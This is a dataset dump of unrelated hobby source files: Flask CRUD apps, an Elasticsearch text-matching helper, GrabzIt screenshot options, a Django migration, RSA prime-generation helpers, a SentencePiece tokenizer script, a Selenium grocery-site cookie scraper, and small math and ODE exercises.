render_template(\"logout.html\")\n\n\n@app.route('/home')\n@login_required\ndef home():\n \"\"\"Display home page.\"\"\"\n user = current_user\n return render_template('home.html', user=user)\n\n\n@app.route('/create_bucketlist', methods=['POST', 'GET'])\n@login_required\ndef create_bucketlist():\n \"\"\"Display create bucket list page.\"\"\"\n title = None\n description = None\n error = None\n user = current_user\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n description = request.form['description']\n\n try:\n u = User.find_by_email(user.email)\n bucket_list = BucketList(title, description)\n bucket_list.add_user(u)\n u.create_bucketlist(bucket_list)\n return redirect(url_for('home'))\n except KeyError:\n error = \"No user found\"\n return render_template('create_bucketlist.html', error=error)\n else:\n return render_template('create_bucketlist.html', error=error)\n\n\n@app.route('/update_bucketlist', methods=['POST', 'GET'])\n@login_required\ndef update_bucketlist():\n \"\"\"Display create bucket list page.\"\"\"\n title = None\n description = None\n error = None\n user = current_user\n bucket_list_id = request.args.get('id')\n bucket_list = None\n\n \"\"\"For GET requests, display the registraion form. 
For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n description = request.form['description']\n id = request.form['id']\n try:\n u = User.find_by_email(user.email)\n for b in u.bucket_lists:\n if b.id == int(id):\n b.title = title\n b.description = description\n return redirect(url_for('home'))\n except KeyError:\n error = \"No user found\"\n return render_template('home.html')\n else:\n u = User.find_by_email(user.email)\n bucket_lists = u.bucket_lists\n for b in bucket_lists:\n if b.id == int(bucket_list_id):\n bucket_list = b\n return render_template('bucketlist_update.html', bucket_list=bucket_list)\n\n\n@app.route('/bucketlist_detail')\n@login_required\ndef bucketlist_detail():\n user = current_user\n id = request.args.get('id')\n bucket_list = None\n try:\n u = User.find_by_email(user.email)\n for b in u.bucket_lists:\n if b.id == int(id):\n bucket_list = b\n except KeyError:\n bucket_list = None\n\n return render_template('bucketlist_detail.html', bucket_list=bucket_list)\n\n\n@app.route('/bucketlist_delete', methods=['POST', 'GET'])\ndef bucketlist_delete():\n id = None\n user = current_user\n\n \"\"\"For GET requests, display the login form. For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n id = request.form['id']\n u = User.find_by_email(user.email)\n try:\n for i, b in enumerate(u.bucket_lists):\n if b.id == int(id):\n del u.bucket_lists[i]\n break\n return redirect(url_for('home'))\n except:\n return render_template('home.html')\n else:\n return render_template('home.html')\n\n\n@app.route('/create_entry', methods=['GET', 'POST'])\n@login_required\ndef create_entry():\n \"\"\"Display entries list page.\"\"\"\n title = None\n content = None\n error = None\n\n \"\"\"For GET requests, display the registraion form. 
For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n content = request.form['content']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entry = Entry(title, content, int(bucket_list_id))\n bucket_list.add_entry(entry)\n return redirect(url_for('show_entries', id=[int(bucket_list_id)]))\n except KeyError:\n error = \"No bucket list found\"\n return render_template('create_entry.html', error=error)\n else:\n bucket_list_id = request.args.get('id')\n return render_template('create_entry.html', bucket_list_id=bucket_list_id)\n\n\n@app.route('/show_entries')\n@login_required\ndef show_entries():\n entries = []\n bucket_list_id = request.args.get('id')\n\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n except KeyError:\n entries = []\n\n return render_template('show_entries.html', entries=entries, bucket_list_id=bucket_list_id)\n\n\n@app.route('/entry_detail')\n@login_required\ndef entry_detail():\n entry = None\n entry_id = request.args.get('entry_id')\n bucket_list_id = request.args.get('bucket_list_id')\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for e in entries:\n if e.id == int(entry_id):\n entry = e\n except KeyError:\n entry = None\n\n return render_template('entry_detail.html', entry=entry)\n\n\n@app.route('/entry_update', methods=['GET', 'POST'])\n@login_required\ndef entry_update():\n \"\"\"Display entries list page.\"\"\"\n title = None\n content = None\n error = None\n entry_id = None\n bucket_list_id = None\n entry = None\n\n entry_id = request.args.get('entry_id')\n bucket_list_id = request.args.get('bucket_list_id')\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n content = request.form['content']\n entry_id = request.form['entry_id']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for e in entries:\n if e.id == int(entry_id):\n e.title = title\n e.content = content\n break\n bucket_list.entries = entries\n\n return redirect(url_for('entry_detail', entry_id=[int(entry_id)], bucket_list_id=[int(bucket_list_id)]))\n except KeyError:\n error = \"No entry found\"\n return render_template('entry_update.html', error=error)\n else:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n for e in entries:\n if e.id == int(entry_id):\n entry = e\n return render_template('entry_update.html', entry=entry)\n\n\n@app.route('/entry_delete', methods=['POST', 'GET'])\ndef entry_delete():\n entry_id = None\n bucket_list_id = None\n bucket_list = None\n entries = None\n\n \"\"\"For GET requests, display the login form. 
For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n entry_id = request.form['entry_id']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for i, e in enumerate(entries):\n if e.id == int(entry_id):\n del entries[i]\n break\n bucket_list.entries = entries\n return redirect(url_for('show_entries', id=[int(bucket_list_id)]))\n except:\n entries = bucket_list.entries\n return render_template('show_entries.html', id=[int(bucket_list_id)])\n else:\n return render_template('show_entries.html', id=[int(bucket_list_id)])\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask_demo.py","file_name":"flask_demo.py","file_ext":"py","file_size_in_byte":11226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330497032","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport sys\nfrom os import path\nfrom tornado.options import options\nfrom elasticsearch import Elasticsearch\n\nBASE_DIR = path.dirname(path.dirname(path.dirname(path.dirname(__file__))))\nsys.path.append(BASE_DIR)\n\nfrom controller.helper import load_config\nfrom controller.page.tool.diff import Diff\nfrom controller.page.tool.variant import normalize\n\n\ndef get_hosts():\n config = load_config() or {}\n hosts = [config.get('esearch') or {'host': '47.95.216.233', 'post': 9200}]\n if hasattr(options, 'testing') and options.testing:\n hosts = [dict(host='dev.tripitakas.net')]\n return hosts\n\n\ndef find(q, index='cb4ocr-ik'):\n \"\"\" 从ES中寻找与q最匹配的document \"\"\"\n if not q:\n return []\n\n if re.match(r'^[0-9a-zA-Z_]+', q):\n match = {'page_code': q}\n else:\n ocr = re.sub(r'[\\x00-\\xff]', '', q)\n ocr = re.sub(Diff.cmp_junk_char, '', ocr)\n match = {'normal': normalize(ocr)}\n\n dsl = {\n 'query': {'match': match},\n 'highlight': {'pre_tags': [''], 'post_tags': [''], 'fields': {'normal': {}}}\n }\n\n es = Elasticsearch(hosts=get_hosts())\n r = es.search(index=index, body=dsl)\n\n return r['hits']['hits']\n\n\ndef find_one(ocr, num=1, only_match=False):\n \"\"\" 从ES中寻找与ocr最匹配的document,返回第num个结果 \"\"\"\n ocr = ''.join(ocr) if isinstance(ocr, list) else ocr.replace('|', '')\n ret = find(ocr)\n if not ret or num - 1 not in range(0, len(ret)):\n return '', []\n hit_page_codes = [r['_source']['page_code'] for r in ret]\n cb = ''.join(ret[num - 1]['_source']['origin'])\n diff = Diff.diff(ocr, cb, label=dict(base='ocr', cmp1='cb'))[0]\n if only_match:\n # 寻找第一个和最后一个同文\n start, end = None, None\n for i, d in enumerate(diff):\n if d.get('is_same') and start is None:\n start = i\n if diff[-i - 1].get('is_same') and end is None:\n end = len(diff) - i - 1\n if start is not None and end is not None:\n break\n diff1 = diff[start: end + 1]\n # 处理diff1中前面几个异文超长的情况\n diff2 = [d for d in diff1 if not d.get('is_same')][:4]\n for d in diff2:\n if len(d.get('cb', '')) - len(d.get('ocr', '')) > 3:\n d['cb'] = '■' * len(d['ocr'])\n txt = ''.join([d['cb'] for d in diff1])\n if end < len(diff) - 1 and not diff[end + 1].get('is_same'):\n last = diff[end + 1]\n txt += last['cb'][:len(last['ocr'])]\n else:\n txt = ''.join(['%s' % d['cb'] if d.get('is_same') else d['cb'] for d in diff])\n return txt.strip('\\n'), hit_page_codes\n\n\ndef find_neighbor(page_code, neighbor='next'):\n \"\"\" 从ES中寻找page_code的前一页或后一页记录 \"\"\"\n assert neighbor in ['prev', 'next']\n head = re.search(r'^([A-Z]{1,2}\\d+n[A-Z]?\\d+[A-Za-z_]?)p([a-z]?\\d+)', 
page_code)\n page_no = head.group(2)\n neighbor_no = str(int(page_no) + 1 if neighbor == 'next' else int(page_no) - 1).zfill(len(page_no))\n neighbor_code = '%sp%s' % (head.group(1), neighbor_no)\n neighbor_node = find(neighbor_code)\n return neighbor_node and neighbor_node[0]\n\n\nif __name__ == '__main__':\n import pymongo\n\n # print([r['_source'] for r in find('由業非以自性滅,故無賴耶亦能生')])\n local_db = pymongo.MongoClient('mongodb://localhost')['tripitaka']\n page = local_db.page.find_one({'name': 'GL_1047_1_11'}, {'ocr': 1})\n ocr1 = page['ocr']\n ocr1 = re.sub(r'[■\\|]', '', ocr1)\n txt1 = find_one(ocr1, only_match=True)[0]\n print(txt1)\n","sub_path":"controller/page/tool/esearch.py","file_name":"esearch.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260309886","text":"#!/usr/bin/python\n\nfrom GrabzIt import GrabzItBaseOptions\n\nclass GrabzItImageOptions(GrabzItBaseOptions.GrabzItBaseOptions):\n \"\"\" Available options when creating a image capture\n\n Attributes:\n\n width the width of the resulting screenshot in pixels. Use -1 to not reduce the width of the screenshot\n height the height of the resulting screenshot in pixels. Use -1 to not reduce the height of the screenshot\n browserWidth the width of the browser in pixels\n browserHeight the height of the browser in pixels. Use -1 to screenshot the whole web page\n format the format the screenshot should be in: bmp8, bmp16, bmp24, bmp, tiff, jpg, png\n delay the number of milliseconds to wait before creating the capture\n targetElement the CSS selector of the only HTML element in the web page to capture\n hideElement the CSS selector(s) of the one or more HTML elements in the web page to hide\n requestAs the user agent type should be used: Standard Browser = 0, Mobile Browser = 1, Search Engine = 2 and Fallback Browser = 3\n customWaterMarkId set a custom watermark to add to the screenshot\n quality set the quality of the screenshot where 0 is poor and 100 excellent. 
The default is -1 which uses the recommended quality\n \"\"\"\n\n def __init__(self):\n GrabzItBaseOptions.GrabzItBaseOptions.__init__(self)\n self.browserWidth = 0\n self.browserHeight = 0\n self.width = 0\n self.height = 0\n self.format = ''\n self.targetElement = ''\n self.hideElement = ''\n self.requestAs = 0\n self.customWaterMarkId = ''\n self.quality = -1\n \n def _getParameters(self, applicationKey, sig, callBackURL, dataName, dataValue):\n params = self._createParameters(applicationKey, sig, callBackURL, dataName, dataValue)\n params[\"width\"] = int(self.width)\n params[\"height\"] = int(self.height)\n params[\"bwidth\"] = int(self.browserWidth)\n params[\"bheight\"] = int(self.browserHeight)\n params[\"delay\"] = int(self.delay)\n params[\"format\"] = str(self.format)\n params[\"target\"] = str(self.targetElement)\n params[\"hide\"] = str(self.hideElement) \n params[\"requestmobileversion\"] = int(self.requestAs)\n params[\"customwatermarkid\"] = str(self.customWaterMarkId) \n params[\"quality\"] = int(self.quality) \n\n return params\n\n def _getSignatureString(self, applicationSecret, callBackURL, url = ''):\n urlParam = '';\n if (url != None and url != ''):\n urlParam = str(url)+\"|\"\n\n callBackURLParam = '';\n if (callBackURL != None and callBackURL != ''):\n callBackURLParam = str(callBackURL)\n\n return applicationSecret +\"|\"+ urlParam + callBackURLParam + \\\n \"|\"+str(self.format)+\"|\"+str(int(self.height))+\"|\"+str(int(self.width))+\"|\"+str(int(self.browserHeight))+\"|\"+str(int(self.browserWidth))+\"|\"+str(self.customId)+ \\\n \"|\"+str(int(self.delay))+\"|\"+str(self.targetElement)+\"|\"+str(self.customWaterMarkId)+\"|\"+str(int(self.requestAs))+\"|\"+str(self.country)+\"|\"+str(int(self.quality))+\"|\"+str(self.hideElement)\n ","sub_path":"python/GrabzIt/GrabzItImageOptions.py","file_name":"GrabzItImageOptions.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286913128","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0022_auto_20150119_1521'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='additionaldetail',\n name='type',\n field=models.SmallIntegerField(default=0, choices=[(0, 'lis\\xe4tieto'), (1, 'P\\xc4\\xc4T\\xd6S'), (2, 'Viety eteenp\\xe4in')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"content/migrations/0023_auto_20150401_1431.py","file_name":"0023_auto_20150401_1431.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"464452432","text":"#%%\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///new-books-collection.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Book(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120), unique=True, nullable=False)\n author = db.Column(db.String(120), unique=False, nullable=False)\n rating = db.Column(db.String(120), unique=False, nullable=False)\n\n def __str__(self):\n return f'{self.title} {self.author} {self.rating}'\n \ndb.create_all()\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef home():\n all_books = Book.query.all()\n \n 
return render_template('index.html', books=all_books)\n\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n if request.method == \"POST\":\n new_book = Book(title=request.form.get('book'), \n author=request.form.get('author'), \n rating=request.form.get('rating'))\n\n db.session.add(new_book)\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('add.html')\n\n\n@app.route(\"/edit\", methods=[\"GET\", \"POST\"])\ndef edit():\n if request.method == \"POST\":\n book_id = request.form.get('id')\n book = Book.query.get(book_id)\n \n book.rating = request.form.get('new_rating')\n db.session.commit()\n return redirect(url_for('home'))\n \n book_id = request.args.get('book_id')\n book = Book.query.get(book_id)\n return render_template('edit.html', book=book)\n\n\n@app.route(\"/delete\")\ndef delete():\n book_id = request.args.get('book_id')\n book = Book.query.get(book_id)\n db.session.delete(book)\n db.session.commit()\n \n return redirect(url_for('home'))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n# %%\n","sub_path":"day63_library_collection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351849137","text":"from random import randint\r\n\r\n#a^b (mod c)\r\ndef bin_mod_exp(a, b, c):\r\n x = 1\r\n while b > 0:\r\n if b & 1 == 1:\r\n x = (x*a) % c\r\n a = (a*a) % c\r\n b >>= 1\r\n return x\r\n\r\ndef _try_composite(a, d, n, s):\r\n if pow(a, d, n) == 1:\r\n return False\r\n for i in range(s):\r\n if pow(a, 2**i * d, n) == n-1:\r\n return False\r\n return True\r\n\r\ndef is_prime_MillerRabin(n, _precision_for_huge_n=16):\r\n if n in _known_primes or n in (0, 1):\r\n return True\r\n if any((n % p) == 0 for p in _known_primes):\r\n return False\r\n d, s = n - 1, 0\r\n while not d % 2:\r\n d, s = d >> 1, s + 1\r\n if n < 1373653:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\r\n if n < 25326001:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\r\n if n < 118670087467:\r\n if n == 3215031751:\r\n return False\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\r\n if n < 2152302898747:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\r\n if n < 3474749660383:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\r\n if n < 341550071728321:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\r\n # otherwise\r\n return not any(_try_composite(a, d, n, s)\r\n for a in _known_primes[:_precision_for_huge_n])\r\n\r\n_known_primes = [2, 3]\r\n_known_primes += [x for x in range(5, 1000, 2) if is_prime_MillerRabin(x)]\r\n\r\n\r\ndef genPrime(bitLen):\r\n #random binary number\r\n binN = \"1\"\r\n for i in range(bitLen -2):\r\n binN += str(randint(0,1))\r\n binN += \"1\"\r\n n = int(binN, 2)\r\n while(not is_prime_MillerRabin(n)):\r\n n += 2\r\n return n\r\n\r\ndef extended_euclid(a, b):\r\n x,y, u,v = 0,1, 1,0\r\n while a != 0:\r\n q, r = b//a, b%a\r\n m, n = x-u*q, y-v*q\r\n b,a, x,y, u,v = a,r, u,v, m,n\r\n gcd = b\r\n return gcd, x, y\r\n\r\ndef mod_inv(a, m):\r\n gcd, x, y = extended_euclid(a, m)\r\n if gcd != 1:\r\n return None\r\n else:\r\n return x % m","sub_path":"Kryptologie/RSA/rsamath.py","file_name":"rsamath.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23358073","text":"import 
sentencepiece as spm\nimport pandas as pd\nimport csv\n\nSRC_DATA_PATH = '../integrated_data/korean_for_nlp.txt'\n\n\nif __name__ == '__main__':\n input = SRC_DATA_PATH\n vocab_size = '1500'\n model_type = 'unigram'\n model_prefix = 'spm_%s_%s' % (model_type, vocab_size)\n max_sentence_length = '9999'\n\n\n spm.SentencePieceTrainer.Train('--input=%s --model_prefix=%s --vocab_size=%s'\n ' --model_type=%s --max_sentence_length=%s'\n ' --pad_id=0 --pad_piece=[PAD]'\n ' --unk_id=1 --unk_piece=[UNK]'\n ' --bos_id=2 --bos_piece=[BOS]'\n ' --eos_id=3 --eos_piece=[EOS]' \n ' --user_defined_symbols=[CLS]' % (\n input, model_prefix, vocab_size, model_type, max_sentence_length))\n\n vocab_list = pd.read_csv('%s.vocab' % model_prefix, sep='\\t', header=None, quoting=csv.QUOTE_NONE)\n print(vocab_list[:10])\n\n sp = spm.SentencePieceProcessor()\n vocab_file = \"%s.model\" % model_prefix\n sp.load(vocab_file)\n\n lines = [\n '나는 안녕하세요 1+1 이벤트 진행 중이다, 가격 1300원이야.',\n \"t 값이 15,021원입니다.\"\n ]\n for line in lines:\n line = sp.IdToPiece(2) + line + sp.IdToPiece(3)\n print(line)\n print(sp.encode_as_pieces(line))\n print(sp.encode_as_ids(line))\n print()\n print(sp.IdToPiece(5))\n print(sp.piece_to_id('[BOS]'))\n","sub_path":"make_custom_sentencepiece_tokenizer.py","file_name":"make_custom_sentencepiece_tokenizer.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643282909","text":"#IMPORT AND CERTIFY FIREBASE\n\n\n #MAINSCRIPTS\n #SELENIUM\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n #TIME\nimport time\nimport datetime\n #JSON\nimport json\n #MULTIPROCESSING\nimport multiprocessing\nfrom functools import partial\n\n\n\n #SELENIUM/BROWSER DRIVER SETUP // RETURN BROWSER DRIVER // FUNCTION\ndef selenium_setup():\n #DEFINE CHROME CAPABILITIES TO WAIT FOR PAGE TO BE INTERACTIVE INSTEAD OF FULL LOAD\n chrome_capabilities = DesiredCapabilities().CHROME\n chrome_capabilities[\"pageLoadStrategy\"] = \"eager\"\n #DEFINE CHROME OPTIONS\n chrome_options = webdriver.ChromeOptions()\n user_agent ='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'\n chrome_options.add_argument(f'user-agent={user_agent}')\n chrome_options.add_argument(\"--lang=en-US,en;q=.9\")\n chrome_options.add_experimental_option(\"prefs\", {\"profile.managed_default_content_settings.images\": 2})\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"start-maximized\")\n chrome_options.add_argument(\"disable-infobars\")\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_experimental_option('excludeSwitches', ['enable-automation']) \n chrome_options.add_experimental_option('useAutomationExtension', False)\n #SET SELENIUM CHROME DRIVER CAPABILITIES/OPTIONS/PATH HERE\n browser_driver = webdriver.Chrome(desired_capabilities=chrome_capabilities, options=chrome_options, executable_path=r'C:\\Users\\Mason\\Desktop\\DeliverMeScraper\\chromedriver.exe')\n #RETURN BROWSER\n return browser_driver\n\n #RUN SELENIUM/BROWSER // RETURN SELENIUM SESSION COOKIES // FUNCTION\ndef 
run_selenium_browser(current_zip_code, current_city, browser_driver, url):\n #proxy.new_har(\"peapod\")\n #LOAD PEAPOD\n browser_driver.get(url)\n #FIND INITIAL ZIP CODE ELEMENTS\n zip_entry = browser_driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div/main/div/div/section[3]/div[2]/zipcode-entry/div/form/div[2]/div/label/div[1]/input')\n submit_button = browser_driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div/main/div/div/section[3]/div[2]/zipcode-entry/div/form/div[2]/div/label/div[2]/button')\n #SEND INITIAL ZIP CODE INPUTS\n zip_entry.send_keys(current_zip_code)\n submit_button.click()\n #PAUSE FOR .5 SECONDS TO ENSURE OPTIONS FOR CITIES LOAD\n time.sleep(.5)\n #CHECK FOR CITIES INPUT\n try:\n #CLICK CITY DROP DOWN FOR CITY OPTIONS\n cities_entry_first_click = browser_driver.find_element_by_css_selector('#main-content > div > section.gateway-page_body-content-wrapper.gateway-page_body-content-wrapper--no-margin > div.gateway-body-content_login-wrapper.gateway-body-content_login-wrapper--rounded-corners > zipcode-entry > div > form > div.gateway-login_single-field-wrapper > div.trailer--double > label > div > div.select-field > select')\n cities_entry_first_click.click()\n #CYCLE THROUGH DROP DOWN MENU CITY OPTIONS FOR CORRECT CITY\n for cities_entry_second_click in cities_entry_first_click.find_elements_by_tag_name('option'):\n if current_city in cities_entry_second_click.text:\n cities_entry_second_click.click()\n break\n #CLICK SUBMIT TO SEND CITY SELECTION\n cities_entry_third_click = browser_driver.find_element_by_css_selector('#main-content > div > section.gateway-page_body-content-wrapper.gateway-page_body-content-wrapper--no-margin > div.gateway-body-content_login-wrapper.gateway-body-content_login-wrapper--rounded-corners > zipcode-entry > div > form > div.gateway-login_single-field-wrapper > div.button-container > div.button-container_control.button-container_control--no-outer-spacing.omega > button')\n cities_entry_third_click.click() \n except:\n pass\n #GRAB SELENIUM SESSION COOKIES / PAUSE FOR .5 SECONDS TO ENSURE GUEST COOKIES LOAD \n time.sleep(.5)\n selenium_cookies = browser_driver.get_cookies()\n #QUIT SELENIUM BROWSER / RETURN SELENIUM COOKIES\n #print(proxy.har)\n #server.stop()\n browser_driver.quit()\n return selenium_cookies\n\n #RUN AUTOMATED SELENIUM BROWSER TO GET GUEST SESSION COOKIES // RETURNS SELENIUM SESSION COOKIES // FUNCTION\ndef get_selenium_cookies(Account_Database):\n #CORRECTLY TRANSLATE/UNPACK MULTOPROCESSING ITERATED ACCOUNT DATABSE\n if (Account_Database[0].isdigit() == True):\n current_zip_code = Account_Database[0]\n current_city = Account_Database[1]\n else:\n current_zip_code = Account_Database[1]\n current_city = Account_Database[0]\n #DEFINE TARGET URL\n url = 'https://www.peapod.com'\n #EXECUTE BROWSER SETUP\n browser_driver = selenium_setup() \n #EXECUTE SELENIUM BROWSER\n selenium_cookies = run_selenium_browser(current_zip_code, current_city, browser_driver, url)\n #RETURN SELENIUM COOKIES\n return selenium_cookies\n\n #RUN AUTO BROWSER //// GET ACCOUNT INFO TO CHECK FOR AVAILABILITY -> OPEN BROWSER AND INPUT DATA TO CREATE GUEST SESSION COOKIES -> RETURN SELENIUM GUEST SESSION SELENIUM COOKIES //// FUNCTION\ndef run_auto_browser(Account_Database):\n start_time = time.time()\n print(\"\")\n #RUN PARALLEL PROCESS FOR EACH UNIQUE ZIP/CITY COMBO AND STORE SELENIUM COOKIES\n with multiprocessing.Pool(processes=len(Account_Database)) as pool:\n all_selenium_guest_session_cookies = pool.map(get_selenium_cookies, 
Account_Database)\n end_time = time.time()\n print(\"Selenium runtime: \" + str(end_time - start_time))\n #RETURN ALL SELENIUM GUEST SESSION COOKIES\n return all_selenium_guest_session_cookies\n\n\n\ndef create_Account_Database_Array_Function(number_Of_Accounts,values):\n width, height = 2, number_Of_Accounts\n account_Database_Array = [[0 for x in range(width)] for y in range(height)] \n n = 0\n for key in values:\n user_zip_code = values.get(key)['zip']\n user_city = values.get(key)['city']\n\n account_Database_Array[n][0] = user_zip_code\n account_Database_Array[n][1] = user_city\n n = n+1\n return account_Database_Array\n\n\n #Main function\ndef MainScout2(dataArray):\n\n\n all_selenium_guest_session_cookies = run_auto_browser(dataArray)\n return all_selenium_guest_session_cookies\n\n\n\n\n\n","sub_path":"MainScriptsUpdated/MainScout2.py","file_name":"MainScout2.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341974873","text":"#id47.py\n\nfrom p_factor import factorization\n\ndef ID47():\n numbers = [2, 3, 4, 5]\n while True:\n flen = [len(factorization(x)) for x in numbers]\n if flen == [4, 4, 4, 4]:\n return numbers[0]\n else:\n numbers = [i + 1 for i in numbers]\n\nif __name__ == '__main__':\n print(ID47())\n","sub_path":"python files/id47.py","file_name":"id47.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582401222","text":"def menu():\n print(\"Bienvenido, ingrese\\n1-Factorial\\n2-Multiplicación\\n\")\n valor = int(input())\n\n if valor == 1:\n print(\"Ingresa un numero: \")\n num = int(input())\n print(\"El numero factorial de:\", num, \"es:\", facto(num))\n elif valor == 2:\n print(\"Ingrese el valor inicial a multiplicar: \")\n num2 = int(input())\n print(\"Ingresa el numero a multiplicar: \")\n num3 = int(input())\n num4 = num2 * num3\n multi(num2, num3, num4)\n print(multi(num2, num3, num4))\n\ndef facto(num : int):\n if num == 1:\n return 1\n return num * facto(num - 1)\n\ndef multi(num2 : int, num3 : int, num4 : int):\n if num2 == num4:\n return num2\n else:\n num2 = num2 + num3\n return multi(num2, num3, num4)\n \n\nmenu()\n\n\n","sub_path":"Parcial 3/RecurMulti/RecurMulti/RecurMulti.py","file_name":"RecurMulti.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472448110","text":"#!/usr/bin/env python\n\n\"\"\"\nPass arguments not in list if only solving a 1d system\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\nfull_output = 1\n\n#Define function to be integrated\ndef f(y,t,params):\n thetaO, thetaO2 = y\n A, E1a, E_1a, E2a, beta, kb = params\n derivs = [1/beta*(-2*A*np.e**(-E1a/kb/t)*thetaO**2 + \\\n 2*A*np.e**(-E_1a/kb/t)*thetaO2),\n\n 1/beta*(A*np.e**(-E1a/kb/t)*thetaO**2 - \\\n A*np.e**(-E_1a/kb/t)*thetaO2 - A*np.e**(-E2a/kb/t)*thetaO2),\n ]\n return derivs\n\n#Parameters\nA = 10.**13 #Attempt frequency 1/s\nE1a = 0.25 #O2cc->2Oc barrier in eV\nE_1a = 1.0 #2Oc->O2cc barrier in eV\nE2a = 2 #1.27 #Desorption barrier of 2Oc\nbeta = 1. 
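\n#A quick sanity check on the kinetics above (a worked example from the constants here;\n#the numbers are illustrative, not from the original file): each channel is an Arrhenius\n#rate divided by the ramp rate, e.g. d(thetaO2)/dT ~ -(A/beta)*np.e**(-E2a/kb/T)*thetaO2\n#for the desorption term. At T = 600 K with A = 1e13 1/s and E2a = 2 eV:\n#E2a/(kb*T) = 2/(8.617e-5*600) ~ 38.7, so A*np.e**(-38.7) ~ 1.6e-4 1/s, i.e. desorption\n#is only just switching on at 600 K.\n#beta above is the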
